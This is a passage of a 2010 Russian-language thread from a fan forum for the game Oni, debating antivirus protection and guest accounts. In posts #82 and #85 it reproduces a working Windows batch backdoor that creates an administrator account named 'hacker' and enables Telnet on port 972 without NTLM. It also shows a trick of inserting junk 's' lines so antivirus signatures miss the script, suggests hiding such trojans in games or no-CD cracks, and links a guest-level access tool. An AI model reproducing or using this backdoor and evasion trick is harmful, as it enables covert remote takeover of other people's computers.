Форум Oni

Русскоязычный форум поклонников игры «Они» от Bungie

  • Здравствуйте, Гость

#81 09-06-2010 08:19:44

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Это троян, а не патч. Вирусом вы его назвали, а не я!

Оффлайн

 

#82 15-06-2010 09:14:31

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Если человек на компе только лазит в инете, смотрит кино, слушает музыку, читает тексты и т.д. - гость для него лучшая защита. А таких большинство.

Мih@ написал(а):

выпиливающим суперпользовательскую учётку

Его цель - открыть доступ к чужому компу!
Если батник сделать так

chcp 1251
s
net user SUPPORT_388945a0 /delete
s
net user hacker hack /add
s
net localgroup Администраторы hacker /add
s
net localgroup Пользователи SUPPORT_388945a0 /del
s
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

то антивирусы угрозы в нём не видят!!! А троян при этом такой же работоспособный и опасный! Антивирусную базу очень легко обмануть. Может проактивная зашита троян остановит, но я сомневаюсь. Представьте , что троян весит не 200 байт, а 200 килобайт и замаскирован под что нибудь безобидное. А уж спрятать его в 4 гигабайтную игру очень легко. Или в 3 мегабайтный no cd.
Вы после этого всё равно уверены, что на трекере безопасно? Там кстати скорость низкая, качать долго. А в локалке быстро.

Оффлайн

 

#83 15-06-2010 12:09:34

Мih@ 
Регистрация: 27-08-2006
Сообщений: 826
Профиль

Re: Защита от вирусов, троянов и т.д.

Manticore написал(а):

то антивирусы угрозы в нём не видят!!!

а касперский классифицирует такой батник как Backdoor.BAT.Teldoor.m, ЧЯДНТ? :3

Оффлайн

 

#84 15-06-2010 14:36:53

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Классифицирует, если троян без "s".

Оффлайн

 

#85 15-06-2010 14:52:11

Мih@ 
Регистрация: 27-08-2006
Сообщений: 826
Профиль

Re: Защита от вирусов, троянов и т.д.

Manticore написал(а):

Классифицирует, если троян без "s".

cat file.bat написал(а):

chcp 1251
s
net user SUPPORT_388945a0 /delete
s
net user hacker hack /add
s
net localgroup Администраторы hacker /add
s
net localgroup Пользователи SUPPORT_388945a0 /del
s
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

ЧЯДНТ?

Оффлайн

 

#86 15-06-2010 15:29:56

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Мih@ написал(а):

ЧЯДНТ?

У вас троян с "s". Надо без "s", как в "Backdoor1.txt". Кстати, Касперкий написал что "неисполняемый формат txt опасен"! Он так не написал открыто, но вы видите строчку "Проверенный файл - Backdoor1.txt - инфицирован".

Отредактировал(а) Manticore (15-06-2010 15:49:46)


Прикрепленные файлы:
Аттачмент Backdoor1.zip, Размер: 173,678 байт, Скачано: 605

Оффлайн

 

#87 15-06-2010 15:50:49

AJIuCaRD (муж.)
Цивил
Откуда: Качканар
Регистрация: 13-06-2010
Сообщений: 5
Профиль

Re: Защита от вирусов, троянов и т.д.

каспер нод аваст..оцтой ИМХО  AVG лучше...

всеми антивирусами пользовался АВГ есдинственный большинство вирусов находит..и комп не тормозит и систему не сносит....стабильный надежный антивирус...

Оффлайн

 

#88 15-06-2010 15:58:39

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

AJIuCaRD написал(а):

АВГ есдинственный большинство вирусов находит

А ты уверен, что это не ложные обнаружения? И когда он пишет "заражен", почему/на каком основании ты веришь антивирусу? Может он просто так это написал?
В том батнике вставь "s" и посмотри, облажается AVG или нет?

Оффлайн

 

#89 15-06-2010 16:00:16

Sockol@ (муж.)
VIP
Откуда: Омская область
Регистрация: 18-04-2010
Сообщений: 666
Профиль

Re: Защита от вирусов, троянов и т.д.

Не NOD32 лучше...вот он у меня вирусы каждый раз находит!!!


В полете!!!

Оффлайн

 

#90 15-06-2010 16:07:31

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Sockol@ написал(а):

NOD32

"s" NOD32 тоже обманул!

Оффлайн

 

#91 15-06-2010 16:08:26

Sockol@ (муж.)
VIP
Откуда: Омская область
Регистрация: 18-04-2010
Сообщений: 666
Профиль

Re: Защита от вирусов, троянов и т.д.

Manticore написал(а):

Sockol@ написал(а):

NOD32

"s" NOD32 тоже обманул!

КАК????ДОКАЖИ!!!!!!!!!!!!!!


В полете!!!

Оффлайн

 

#92 15-06-2010 16:14:19

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Sockol@ написал(а):

КАК????ДОКАЖИ!!!!!!!!!!!!!!

Как-как. По сигнатуре не совпадает, поэтому NOD32 пишет "не заражен".
У тебя есть NOD32? Создай троян с "s" и посмотри реакцию NOD32. На virustotal троян закинь. Там 30 антивирусов, никто угрозы не увидит. Может потому что троян без жала? С жалом я тоже пробовал, не видят угрозы.
Ща за пивком сбегаю, потом докажу.

Оффлайн

 

#93 15-06-2010 17:14:41

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Антивирус обманывать очень просто, но они как бы защищают от распространённых известных вирусов, которые нацелены на массовое заражение. Пока в операционной системе можно исполнять недоверенные программы с повышенными правами, от вируса защититься не получится.
"Проактивная" защита это ужасный костыль для ненадёжных ОС и беспомощных администраторов.

Вывод - антивирус - не лучшая защита! Касперский или AVG  - не важно.

Оффлайн

 

#94 15-06-2010 19:41:46

Sfeli (муж.)
 
Регистрация: 31-12-2006
Сообщений: 212
Профиль

Re: Защита от вирусов, троянов и т.д.

Manticore, доступ открыть и из-под гостя можно. И не только батником. И не только через службу телнета. Вот эта фигня, например, работает под гостем (даёт, сколько есть доступа у гостя ? достаточно, чтобы получить больше) и на протяжении лет пяти почти сканерами не детектилась (сейчас 6/40 и проактивкой везде почти): http://boooooo.pastebin.com/nWQczWnF (компилировать не буду, а в коде баг во избежание ;-)) Я иногда пользуюсь Анубисом против такого (но это не антивирус). Ну и файрвол спасает, хоть и обходится тоже.

Грамотно расставленные разрешения тебя от многого спасут, но ты убьёшься их расставлять. И не факт, что однажды ты сам не запустишь какую-нибудь гадость под админом. Гораздо проще сразу думать, откуда и что ты качаешь. И не ползать по левым варезятникам и порносайтам, да.


Died. Completely.

Оффлайн

 

#95 15-06-2010 19:49:41

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Sfeli написал(а):

Вот эта фигня, например, работает под гостем

Каким образом? Там же почти всё запрещено! Службы перекрыты, изменения файлов тоже.

Отредактировал(а) Manticore (15-06-2010 19:50:56)

Оффлайн

 

#96 15-06-2010 20:03:04

Sfeli (муж.)
 
Регистрация: 31-12-2006
Сообщений: 212
Профиль

Re: Защита от вирусов, троянов и т.д.

Блин. Программы запускать можно? В интернет можно? Этого достаточно.
Но вообще, этому уже много лет, и я могу ошибаться вполне) Скопипастил из архива)

Отредактировал(а) Sfeli (15-06-2010 20:04:08)


Died. Completely.

Оффлайн

 

#97 15-06-2010 20:10:26

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Запуск (чтение), изменение (в RAM) и запись (в HDD) - разные вещи! В госте в основном чтение. В инете всё крутится в браузере и редко вылезает наружу.

Оффлайн

 

#98 15-06-2010 20:20:45

Sfeli (муж.)
 
Регистрация: 31-12-2006
Сообщений: 212
Профиль

Re: Защита от вирусов, троянов и т.д.

:self-murder:


Died. Completely.

Оффлайн

 

#99 16-06-2010 17:01:49

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Sfeli, я вчера литр винца выпил, поэтому не то написал! Исправлю!

Sfeli написал(а):

Программы запускать можно?

Можно. Запись в HDD запрещена (кроме Мои документы). Если что-то и испортят, то в RAM, после перезагрузки всё восстановится. Можно переустановить учетку и всё починится. Это быстро и легко.

Sfeli написал(а):

В интернет можно?

Большинство программ работают в браузере, через браузер редко в винду что либо проходит. Если и пройдет, ограничение прав убьёт вирус. Если браузер сломается, перезапускаешь/переустанавливаешь его  - и всё.

Оффлайн

 

#100 17-06-2010 09:36:39

Manticore 
VIP
Регистрация: 10-04-2009
Сообщений: 1108
Профиль

Re: Защита от вирусов, троянов и т.д.

Если я отключил все службы, позволяющие удаленно смотреть мой комп и запретил их запуск, то как меня прошпионят?

Оффлайн

 

Board footer

© 2006-2024 Амэ & Mih@
ОНИмия – фан-сайт игры Oni
Движок форума - модифицированный PunBB